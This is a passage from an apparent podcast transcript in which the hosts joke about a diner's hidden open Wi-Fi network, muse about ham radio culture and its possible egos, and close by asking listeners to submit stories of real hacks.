how to connect their smartphones so they can send, you know, Snapchat's.
It's a lot of work to set up a passkey or like a
passphrase for the thing. So just like leave it open, just hide it. If nobody knows it's there,
then how is anybody going to use it? So it's so much more convenient. You don't need to know the password.
You do need to know the SSID. So you're just asking them to save the less secure string of
jargon. Errors were made in this diner. I'm sensing. I'm going to assume
diner owner, not security. That's valid. That's valid. I get it.
I like the swing at it being like, I'm going to take it off.
No one's going to see this network here.
It will be extremely secure.
Secured.
Exactly.
I think the War of the Worlds, Orson Welles' fake broadcast, is like a really,
that's a really good move.
Because no, honestly, probably everyone in that diner knew that there wasn't really a zombie outbreak.
But it has that veneer of a, could there be?
Could there be zombies?
For like a second, everyone wondered.
as they were eating their eggs.
Eating my grilled ham and cheese and tomato soup.
Sitting here wondering if this is the last good meal I'll ever have.
Cock the shotgun.
Pull the headband on tighter.
War paint under the eyes.
Like, let's do this.
I've been planning for years.
I got a van that's got spikes on it.
I'm going to rule the wasteland.
Well, you have fun with that.
I will not.
The wasteland will rule me.
But it's fun to imagine.
I like this.
I also want to know what to.
I feel like I've never been to a ham radio conference,
but I got to think that is a,
that is a chill, wholesome vibe.
I bet that is a,
and I mean that sincerely.
Like,
that sounds like a fun weekend.
I got to,
you got to wonder if there's like,
like every,
every little subset has egos, right?
Like, what is a ham radio ego?
Like, is there,
like,
I've been a member of a lot of little subsets.
Like,
I used to play competitive tabletop gaming.
and you go to the world championships
and, like, there were egos there.
Yeah, sure.
Even though it's like, you're the, like,
biggest dog of, like, the 14,000 people globally
that play this silly game.
And, like, there's just all these weird things.
So it's like, what is a ham radio ego?
Right.
That's the real thing that jumps into me is, like,
is there some, like, cock of the walk that, like,
is the ham radio guy?
Yeah, it's a good question.
I assume they're probably, I assume they're, like,
the nicer you are, the bigger ego.
Like, the more notorious you would be.
Like, I feel like that's,
the kind of like innocent, delightful subculture that like rewards being a good person.
Sure. They're so nice. I hate them for it. See, I was going to go in the like darker direction.
Like is there a dark corner of the ham radio community? Like are we like the pirates or whatever
broadcasting copyrighted musical material over their ham radios. People jamming other people's
ham radios and beefs that go back years. I don't know. They're having.
There's got to be.
There's got to be.
People broadcast and like propaganda between, I don't know.
I just, I want to see the seedy underbelly of ham radio.
I think I'm just for my own sake, I'm going to believe that like the largest celebrity
and influencer in the ham radio community is like the nicest human.
I like that.
I prefer to believe that.
Yeah.
It's like Jack, it's like I see Jack at every conference.
He will literally stop doing whatever he's doing to like help you solve and figure out what
you need.
Who's the Jack?
of ham radio, and they're probably an extremely chill human being. Exactly. Yeah.
I like that a lot. Okay, I think that's another one. I think that's another one, another Hotline
Hacked in the bucket, brought to you by Push Security, pushsecurity.com. Thank you for
sharing all of your calls, thank you for sending them on over. Again, if you want to share
your strange tale of technology, true hack, computer confession, we've been getting lots of like
different types of calls and we really like that. Go over to hotlinehacked.com,
submit text, submit a voice.
You can call an actual phone line.
It's pretty cool.
Get at us with it.
I will say, let's put a request out.
What kind of story do I want to hear?
I want a real hack.
I want a penetration.
I want somebody to have hacked a web server.
I know there's a million of you out there listening to this that have done that.
So like somebody call in, email in, send in a voice change thing, do whatever.
But send us in a real story about like a real hack.
Real hacks.
I like it.
Real hacks in the next one.
Don't have to disclose who the target was unless you want to.
Just send us something that's got like a good depth of technical complexity.
I like that's what I want to hear.
And I remember in the last one, someone, we were talking about receipts.
And you don't need all receipts.
If you threw a zombie video up on a Denny's sports display, I'll take your word for it.
but like, oh boy, did I love, love having those videos we could play the audio from in the calls.
So I'll pass that in.
Okay.
And with that, have a great week or two, depending on when our next episode comes out in relation to this.
And have a great month.
And we'll see you guys soon.
Catch you in the next one.
